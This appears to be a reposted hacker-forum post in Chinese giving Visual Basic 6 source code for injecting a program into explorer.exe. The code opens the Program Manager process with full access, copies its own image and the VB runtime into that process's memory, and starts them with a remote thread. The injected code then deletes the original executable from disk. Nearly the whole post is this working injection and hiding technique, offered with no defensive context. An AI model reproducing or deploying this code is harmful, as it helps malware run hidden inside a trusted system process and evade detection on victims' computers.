文章作者:零號(暗夜盛裝)
信息來源:黑客動畫吧

QUOTE:
這是注入EXPLORER.EXE線程內存保留地址的核心代碼.終于突破了` 555555

Option ? Explicit
Public ? Declare ? Function ?OpenProcess? Lib ? " kernel32 " ?( ByVal ?dwDesiredAccess? As ? Long ,? ByVal ?bInheritHandle? As ? Long ,? ByVal ?dwProcessId? As ? Long )? As ? Long
Public ? Declare ? Function ?VirtualAllocEx? Lib ? " kernel32 " ?( ByVal ?ProcessHandle? As ? Long ,? ByVal ?lpAddress? As ? Long ,? ByVal ?dwSize? As ? Long ,? ByVal ?flAllocationType? As ? Long ,? ByVal ?flProtect? As ? Long )? As ? Long
Public ? Declare ? Function ?VirtualFreeEx? Lib ? " kernel32 " ?( ByVal ?ProcessHandle? As ? Long ,?lpAddress? As ?Any,? ByVal ?dwSize? As ? Long ,? ByVal ?dwFreeType? As ? Long )? As ? Long
Public ? Declare ? Function ?GetWindowThreadProcessId? Lib ? " user32 " ?( ByVal ?hwnd? As ? Long ,?lpdwProcessId? As ? Long )? As ? Long
Public ? Declare ? Function ?GetProcAddress? Lib ? " kernel32 " ?( ByVal ?hModule? As ? Long ,? ByVal ?lpProcName? As ? String )? As ? Long
Public ? Declare ? Function ?FindWindow? Lib ? " user32 " ? Alias ? " FindWindowA " ?( ByVal ?lpClassName? As ?Any,? ByVal ?lpWindowName? As ?Any)? As ? Long
Public ? Declare ? Function ?CreateRemoteThread? Lib ? " kernel32 " ?( ByVal ?ProcessHandle? As ? Long ,?lpThreadAttributes? As ? Long ,? ByVal ?dwStackSize? As ? Long ,?lpStartAddress? As ? Long ,?lpParameter? As ?Any,? ByVal ?dwCreationFlags? As ? Long ,?lpthreadid? As ? Long )? As ? Long
Public ? Declare ? Function ?CreateThread? Lib ? " kernel32 " ?( ByVal ?lpThreadAttributes? As ?Any,? ByVal ?dwStackSize? As ? Long ,? ByVal ?lpStartAddress? As ? Long ,?lpParameter? As ?Any,? ByVal ?dwCreationFlags? As ? Long ,?lpthreadid? As ? Long )? As ? Long
Public ? Declare ? Function ?GetModuleHandleA? Lib ? " kernel32 " ?( ByVal ?ModName? As ?Any)? As ? Long
Public ? Declare ? Function ?WriteProcessMemory? Lib ? " kernel32 " ?( ByVal ?ProcessHandle? As ? Long ,?lpBaseAddress? As ?Any,?lpBuffer? As ?Any,? ByVal ?nSize? As ? Long ,?lpNumberOfBytesWritten? As ? Long )? As ? Long
Public ? Declare ? Function ?ReadProcessMemory? Lib ? " kernel32 " ?( ByVal ?hProcess? As ? Long ,?lpBaseAddress? As ?Any,?lpBuffer? As ?Any,? ByVal ?nSize? As ? Long ,?lpNumberOfBytesWritten? As ? Long )? As ? Long
Public ? Declare ? Function ?LoadLibrary? Lib ? " kernel32 " ? Alias ? " LoadLibraryA " ?( ByVal ?lpLibFileName? As ? String )? As ? Long
Public ? Declare ? Function ?CallWindowProc? Lib ? " user32 " ? Alias ? " CallWindowProcA " ?( ByVal ?lpPrevWndFunc? As ? Long ,? ByVal ?hwnd? As ? Long ,? ByVal ?Msg? As ?Any,? ByVal ?wParam? As ?Any,? ByVal ?lParam? As ?Any)? As ? Long
Public ? Declare ? Function ?MessageBox? Lib ? " user32 " ? Alias ? " MessageBoxA " ?( ByVal ?hwnd? As ? Long ,? ByVal ?lpText? As ? String ,? ByVal ?lpCaption? As ? String ,? ByVal ?wType? As ? Long )? As ? Long
Public ? Declare ? Function ?DeleteFile? Lib ? " kernel32 " ? Alias ? " DeleteFileA " ?( ByVal ?lpFileName? As ? String )? As ? Long
Public ? Declare ? Function ?CreateEvent? Lib ? " kernel32 " ? Alias ? " CreateEventA " ?( ByVal ?lpEventAttributes? As ? Long ,? ByVal ?bManualReset? As ? Long ,? ByVal ?bInitialState? As ? Long ,? ByVal ?lpname? As ? String )? As ? Long
Public ? Declare ? Function ?GetModuleFileName? Lib ? " kernel32 " ? Alias ? " GetModuleFileNameA " ?( ByVal ?hModule? As ? Integer ,? ByVal ?lpFileName? As ? String ,? ByVal ?nSize? As ? Integer )? As ? Integer
Public ? Declare ? Function ?GetCurrentProcessId? Lib ? " kernel32 " ?()? As ? Long
Public ? Declare ? Function ?GetMessage? Lib ? " user32 " ? Alias ? " GetMessageA " ?(lpMsg? As ?Msg,? ByVal ?hwnd? As ? Long ,? ByVal ?wMsgFilterMin? As ? Long ,? ByVal ?wMsgFilterMax? As ? Long )? As ? Long
Public ? Declare ? Function ?TranslateMessage? Lib ? " user32 " ?(lpMsg? As ?Msg)? As ? Long
Public ? Declare ? Function ?DispatchMessage? Lib ? " user32 " ? Alias ? " DispatchMessageA " ?(lpMsg? As ?Msg)? As ? Long
Public ? Declare ? Function ?ShowWindow? Lib ? " user32 " ?( ByVal ?hwnd? As ? Long ,? ByVal ?nCmdShow? As ? Long )? As ? Long
Public ? Declare ? Function ?LoadCursor? Lib ? " user32 " ? Alias ? " LoadCursorA " ?( ByVal ?hInstance? As ? Long ,? ByVal ?lpCursorName? As ?Any)? As ? Long
Public ? Declare ? Function ?LoadIcon? Lib ? " user32 " ? Alias ? " LoadIconA " ?( ByVal ?hInstance? As ? Long ,? ByVal ?lpIconName? As ? String )? As ? Long
Public ? Declare ? Function ?CreateFontIndirect? Lib ? " gdi32 " ? Alias ? " CreateFontIndirectA " ?(lpLogFont? As ?LOGFONT)? As ? Long
Public ? Declare ? Function ?DestroyWindow? Lib ? " user32 " ?( ByVal ?hwnd? As ? Long )? As ? Long
Public ? Declare ? Function ?SendMessage? Lib ? " user32 " ? Alias ? " SendMessageA " ?( ByVal ?hwnd? As ? Long ,? ByVal ?wMsg? As ? Long ,? ByVal ?wParam? As ? Long ,?lParam? As ?Any)? As ? Long
Public ? Declare ? Function ?CreateWindowEx? Lib ? " user32 " ? Alias ? " CreateWindowExA " ?( ByVal ?dwExStyle? As ? Long ,? ByVal ?lpClassName? As ? String ,? ByVal ?lpWindowName? As ? String ,? ByVal ?dwStyle? As ? Long ,? ByVal ?x? As ? Long ,? ByVal ?y? As ? Long ,? ByVal ?nWidth? As ? Long ,? ByVal ?nHeight? As ? Long ,? ByVal ?hWndParent? As ? Long ,? ByVal ?hMenu? As ? Long ,? ByVal ?hInstance? As ? Long ,?lpParam? As ?Any)? As ? Long
Public ? Declare ? Function ?SetWindowText? Lib ? " user32 " ? Alias ? " SetWindowTextA " ?( ByVal ?hwnd? As ? Long ,? ByVal ?lpString? As ? String )? As ? Long
Public ? Declare ? Function ?SetWindowLong? Lib ? " user32 " ? Alias ? " SetWindowLongA " ?( ByVal ?hwnd? As ? Long ,? ByVal ?nIndex? As ? Long ,? ByVal ?dwNewLong? As ? Long )? As ? Long
Public ? Declare ? Function ?RegisterClass? Lib ? " user32 " ? Alias ? " RegisterClassA " ?( Class ? As ?WNDCLASS)? As ? Long
Public ? Declare ? Function ?UnregisterClass? Lib ? " user32 " ? Alias ? " UnregisterClassA " ?( ByVal ?lpClassName? As ? String ,? ByVal ?hInstance? As ? Long )? As ? Long
Public ? Declare ? Function ?DefWindowProc? Lib ? " user32 " ? Alias ? " DefWindowProcA " ?( ByVal ?hwnd? As ? Long ,? ByVal ?wMsg? As ? Long ,? ByVal ?wParam? As ? Long ,? ByVal ?lParam? As ? Long )? As ? Long
Public ? Declare ? Function ?CreateFile? Lib ? " kernel32 " ? Alias ? " CreateFileA " ?( ByVal ?lpFileName? As ? String ,? ByVal ?dwDesiredAccess? As ? Long ,? ByVal ?dwShareMode? As ? Long ,? ByVal ?lpSecurityAttributes? As ? Long ,? ByVal ?dwCreationDisposition? As ? Long ,? ByVal ?dwFlagsAndAttributes? As ? Long ,? ByVal ?hTemplateFile? As ? Long )? As ? Long
Public ? Declare ? Function ?ReadFile? Lib ? " kernel32 " ?( ByVal ?hFile? As ? Long ,?lpBuffer? As ?Any,? ByVal ?nNumberOfBytesToRead? As ? Long ,?lpNumberOfBytesRead? As ? Long ,? ByVal ?lpOverlapped? As ? Long )? As ? Long
Public ? Declare ? Function ?CloseHandle? Lib ? " kernel32 " ?( ByVal ?hObject? As ? Long )? As ? Long
Public ? Declare ? Function ?WriteFile? Lib ? " kernel32 " ?( ByVal ?hFile? As ? Long ,?lpBuffer? As ?Any,? ByVal ?nNumberOfBytesToWrite? As ? Long ,?lpNumberOfBytesWritten? As ? Long ,? ByVal ?lpOverlapped? As ? Long )? As ? Long
Public ? Declare ? Function ?GetFileSize? Lib ? " kernel32 " ?( ByVal ?hFile? As ? Long ,?lpFileSizeHigh? As ? Long )? As ? Long
Public ? Declare ? Function ?GetLastError? Lib ? " kernel32 " ?()? As ? Long
Public ? Declare ? Sub ?Sleep? Lib ? " kernel32 " ?( ByVal ?time? As ? Long )
 Public ? Declare ? Sub ?PostQuitMessage? Lib ? " user32 " ?( ByVal ?nExitCode? As ? Long )
 Public ? Declare ? Sub ?ExitThread? Lib ? " kernel32 " ?( ByVal ?dwExitCode? As ? Long )
 Public ? Declare ? Sub ?ExitProcess? Lib ? " kernel32 " ?( ByVal ?dwExitCode? As ? Long )
 Public ? Declare ? Sub ?CopyMemory? Lib ? " kernel32 " ? Alias ? " RtlMoveMemory " ?(Destination? As ?Any,?Source? As ?Any,? ByVal ?Length? As ? Long )

 Public ?Type?POINTAPI
x? As ? Long
y? As ? Long
End ?Type
 Public ?Type?Msg
hwnd? As ? Long
message? As ? Long
wParam? As ? Long
lParam? As ? Long
time? As ? Long
pt? As ?POINTAPI
 End ?Type
 Public ?Type?WNDCLASS
style? As ? Long
lpfnwndproc? As ? Long
cbClsextra? As ? Long
cbWndExtra2? As ? Long
hInstance? As ? Long
hIcon? As ? Long
hCursor? As ? Long
hbrBackground? As ? Long
lpszMenuName? As ? String
lpszClassName? As ? String
End ?Type
 Public ?Type?LOGFONT
lfHeight? As ? Long
lfWidth? As ? Long
lfEscapement? As ? Long
lfOrientation? As ? Long
lfWeight? As ? Long
lfItalic? As ? Byte
lfUnderline? As ? Byte
lfStrikeOut? As ? Byte
lfCharSet? As ? Byte
lfOutPrecision? As ? Byte
lfClipPrecision? As ? Byte
lfQuality? As ? Byte
lfPitchAndFamily? As ? Byte
lfFaceName( 32 )? As ? Byte
End ?Type

 Public ? Const ?GWL_WNDPROC? = ?( - 4 )
 Public ? Const ?WS_VISIBLE? = ? & H10000000
 Public ? Const ?WS_CHILD? = ? & H40000000
 Public ? Const ?WS_THICKFRAME? = ? & H40000
 Public ? Const ?WS_TABSTOP? = ? & H10000
 Public ? Const ?WS_BORDER? = ? & H800000
 Public ? Const ?WS_OVERLAPPED? = ? & H0 &
Public ? Const ?WS_CAPTION? = ? & HC00000
 Public ? Const ?WS_SYSMENU? = ? & H80000
 Public ? Const ?WS_MINIMIZEBOX? = ? & H20000
 Public ? Const ?WS_MAXIMIZEBOX? = ? & H10000
 Public ? Const ?WS_OVERLAPPEDWINDOW? = ?(WS_OVERLAPPED? Or ?WS_CAPTION? Or ?WS_SYSMENU? Or ?WS_THICKFRAME? Or ?WS_MINIMIZEBOX? Or ?WS_MAXIMIZEBOX)
 Public ? Const ?WS_EX_CLIENTEDGE? = ? & H200 &
Public ? Const ?WS_EX_WINDOWEDGE? = ? & H100 &
Public ? Const ?WS_EX_STATICEDGE? = ? & H20000
 Public ? Const ?WM_SETTEXT? = ? & HC
 Public ? Const ?WM_GETTEXTLENGTH? = ? & HE
 Public ? Const ?WM_VSCROLL? = ? & H115
 Public ? Const ?WM_KEYUP? = ? & H101
 Public ? Const ?WM_LBUTTONUP? = ? & H202
 Public ? Const ?WM_LBUTTONDOWN? = ? & H201
 Public ? Const ?WM_SHOWWINDOW? = ? & H18
 Public ? Const ?WM_DESTROY? = ? & H2
 Public ? Const ?WM_SETFONT? = ? & H30
 Public ? Const ?WM_COPY? = ? & H301
 Public ? Const ?WM_PASTE? = ? & H302
 Public ? Const ?INVALID_HANDLE_VALUE? = ? - 1
Public ? Const ?GENERIC_WRITE? = ? & H40000000
 Public ? Const ?GENERIC_READ? = ? & H80000000
 Public ? Const ?GENERIC_ALL? = ? & H10000000
 Public ? Const ?FILE_ATTRIBUTE_NORMAL? = ? & H80
 Public ? Const ?CREATE_NEW? = ? 1
Public ? Const ?CREATE_ALWAYS? = ? 2
Public ? Const ?OPEN_EXISTING? = ? 3
Public ? Const ?OPEN_ALWAYS? = ? 4
Public ? Const ?FILE_SHARE_READ? = ? & H1
 Public ? Const ?FILE_SHARE_WRITE? = ? & H2
 Public ? Const ?TRUNCATE_EXISTING? = ? 5
Public ? Const ?COLOR_WINDOW? = ? 5
Public ? Const ?IDC_ARROW? = ? 32512 &
Public ? Const ?IDI_APPLICATION? = ? 32512 &
Public ? Const ?SW_SHOWNORMAL? = ? 1
Public ? Const ?CW_USEDEFAULT? = ? & H80000000
 Public ? Const ?gClassName? = ? " CustomClName "
Public ? Const ?gAppName? = ? " Application?caption "
Public ?ghWnd? As ? Long

Const ?MEM_COMMIT? = ? & H1000
 Const ?MEM_RESERVE? = ? & H2000
 Const ?MEM_RELEASE? = ? & H8000
 Const ?PAGE_EXECUTE_READWRITE? = ? & H40 &
Const ?IMAGE_NUMBEROF_DIRECTIRY_ENRIES? = ? 16
Const ?STANDARD_RIGHTS_REQUIRED? = ? & HF0000
 Const ?SYNCHRONIZE? = ? & H100000
 Const ?PROCESS_ALL_ACCESS? = ?(STANDARD_RIGHTS_REQUIRED? Or ?SYNCHRONIZE? Or ? & HFFF)

Type?IMAGE_DATA_DIRECTORY
VirtualAddress? As ? Long
Size? As ? Long
End ?Type

Type?IMAGE_FILE_HEADER
Machine? As ? Integer
NumberOfSections? As ? Integer
TimeDataStamp? As ? Long
PointerToSymbolTable? As ? Long
NumberOfSymbols? As ? Long
SizeOfOptionalHeader? As ? Integer
Characteristics? As ? Integer
End ?Type

Type?IMAGE_OPTIONAL_HEADER32
Magic? As ? Integer
MajorLinkerVersion? As ? Byte
MinorLinkerVersion? As ? Byte
SizeOfCode? As ? Long
SizeOfInitalizedData? As ? Long
SizeOfUninitalizedData? As ? Long
AddressOfEntryPoint? As ? Long
BaseOfCode? As ? Long
BaseOfData? As ? Long
ImageBase? As ? Long
SectionAlignment? As ? Long
FileAlignment? As ? Long
MajorOperatingSystemVersion? As ? Integer
MinorOperatingSystemVersion? As ? Integer
MajorImageVersion? As ? Integer
MinorImageVersion? As ? Integer
MajorSubsystemVersion? As ? Integer
MinorSubsystemVersion? As ? Integer
Reserved1? As ? Long
SizeOfImage? As ? Long
SizeOfHeaders? As ? Long
CheckSum? As ? Long
Subsystem? As ? Integer
DllCharacteristics? As ? Integer
SizeOfStackReserve? As ? Long
SizeOfStackCommit? As ? Long
SizeOfHeapReserve? As ? Long
SizeOfHeapCommit? As ? Long
LoaerFlags? As ? Long
NumberOfRvaAndSizes? As ? Long
DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES? - ? 1 )? As ?IMAGE_DATA_DIRECTORY
 End ?Type

Type?test
szTarget? As ? String
End ?Type

Type?IMAGE_DOS_HEADER
e_magic? As ? Integer
e_cblp? As ? Integer
e_cp? As ? Integer
e_crlc? As ? Integer
e_cparhdr? As ? Integer
e_minalloc? As ? Integer
e_maxalloc? As ? Integer
e_ss? As ? Integer
e_sp? As ? Integer
e_csum? As ? Integer
e_ip? As ? Integer
e_cs? As ? Integer
e_lfarlc? As ? Integer
e_onvo? As ? Integer
e_res( 3 )? As ? Integer
e_oemid? As ? Integer
e_oeminfo? As ? Integer
e_res2( 9 )? As ? Integer
e_lfanew? As ? Long
End ?Type
 Const ?szTarget? As ? String ? = ? " ProgMan "
Global?szFileName? As ? String ? * ? 261
Public ? Sub ?Main()

 Dim ?PID? As ? Long ,?ProcessHandle? As ? Long
Dim ?Size? As ? Long ,?BytesWritten? As ? Long ,?TID? As ? Long ,? Module ? As ? Long ,?NewModule? As ? Long
Dim ?PImageOptionalHeader? As ?IMAGE_OPTIONAL_HEADER32,?PImageDosHeader? As ?IMAGE_DOS_HEADER,?TImageFileHeader? As ?IMAGE_FILE_HEADER
 Dim ?ExeVariable? As ? Long

GetModuleFileName? 0 ,?szFileName,? 261

GetWindowThreadProcessId?FindWindow(szTarget,? 0 & ),?PID

ProcessHandle? = ?OpenProcess(PROCESS_ALL_ACCESS,? 0 ,?PID)

 Module ? = ?GetModuleHandleA(vbNullString)

CopyMemory?PImageDosHeader,? ByVal ? Module ,? Len (PImageDosHeader)

CopyMemory?PImageOptionalHeader,? ByVal ?( Module ? + ?PImageDosHeader.e_lfanew? + ? 4 ? + ? Len (TImageFileHeader)),? Len (PImageOptionalHeader)

Size? = ?PImageOptionalHeader.SizeOfImage

VirtualFreeEx?ProcessHandle,? Module ,? 0 ,?MEM_RELEASE

NewModule? = ?VirtualAllocEx(ProcessHandle,? Module ,?Size,?MEM_RESERVE? Or ?MEM_COMMIT,?PAGE_EXECUTE_READWRITE)

WriteProcessMemory?ProcessHandle,? ByVal ?NewModule,? ByVal ? Module ,?Size,?BytesWritten

ExeVariable? = ?VirtualAllocEx(ProcessHandle,? 0 ,? 261 ,?MEM_RESERVE? Or ?MEM_COMMIT,?PAGE_EXECUTE_READWRITE)
WriteProcessMemory?ProcessHandle,? ByVal ?ExeVariable,? ByVal ?szFileName,? 261 ,?BytesWritten

 Dim ?VBMod? As ? Long ,?VBSize? As ? Long ,?VBNewMod? As ? Long
VBMod? = ?GetModuleHandleA( " msvbvm60.dll " )
CopyMemory?PImageDosHeader,? ByVal ?VBMod,? Len (PImageDosHeader)
CopyMemory?PImageOptionalHeader,? ByVal ?(VBMod? + ?PImageDosHeader.e_lfanew? + ? 4 ? + ? Len (TImageFileHeader)),? Len (PImageOptionalHeader)
VBSize? = ?PImageOptionalHeader.SizeOfImage
VBNewMod? = ?VirtualAllocEx(ProcessHandle,?VBMod,?VBSize,?MEM_RESERVE? Or ?MEM_COMMIT,?PAGE_EXECUTE_READWRITE)
WriteProcessMemory?ProcessHandle,? ByVal ?VBNewMod,? ByVal ?VBMod,?VBSize,?BytesWritten

CreateRemoteThread?ProcessHandle,? ByVal ? 0 ,? 0 ,? ByVal ?GetAdd( AddressOf ?HijackModule),? ByVal ?ExeVariable,? 0 ,?TID
ExitProcess? 0
End?Sub
Private ? Function ?GetAdd(Entrypoint? As ? Long )? As ? Long
GetAdd? = ?Entrypoint
 End?Function
Private ? Function ?MainModule(Stuff? As ? Long )? As ? String

Dim ?BytesWritten? As ? Long ,?wc? As ?WNDCLASS,?szExename? As ? String ? * ? 261
Dim ?lngFileHandle? As ? Long ,?lngLength? As ? Long ,?Exec? As ? String ,?lBytesRead? As ? Long ,?szTestName? As ? String

ReadProcessMemory?OpenProcess(PROCESS_ALL_ACCESS,? 0 ,?GetCurrentProcessId),? ByVal ?Stuff,? ByVal ?szExename,? 261 ,? ByVal ?BytesWritten

 With ?wc
.lpfnwndproc? = ?GetAdd( AddressOf ?WndProc)
.hbrBackground? = ? 5
.lpszClassName? = ? " HijackedClass "
End ? With
RegisterClass?wc

ShowWindow?CreateWindowEx( 0 ,? " HijackedClass " ,? " Hijacked?Form " ,?WS_OVERLAPPEDWINDOW,? 100 ,? 100 ,? 340 ,? 240 ,? 0 ,? 0 ,?GetModuleHandleA( 0 & ),? ByVal ? 0 & ),? 1

MessageBox? 0 ,? " Hijack?Module?Working " ,? " Sucess! " ,? 0

DeleteFile?szExename

 Do :?DoEvents:?Sleep? 100 :? Loop
End?Function
Public ? Function ?HijackModule( ByVal ?Stuff? As ? Long )? As ? Long

MainModule?Stuff
 End?Function
Public ? Function ?WndProc( ByVal ?hwnd? As ? Long ,? ByVal ?wMsg? As ? Long ,? ByVal ?wParam? As ? Long ,? ByVal ?lParam? As ? Long )? As ? Long
If ?wMsg? = ? & H201? Then ?MessageBox? 0 ,? " 提示A " ,? " 提示B " ,? 0
WndProc? = ?DefWindowProc(hwnd,?wMsg,?wParam,?lParam)
 End?Function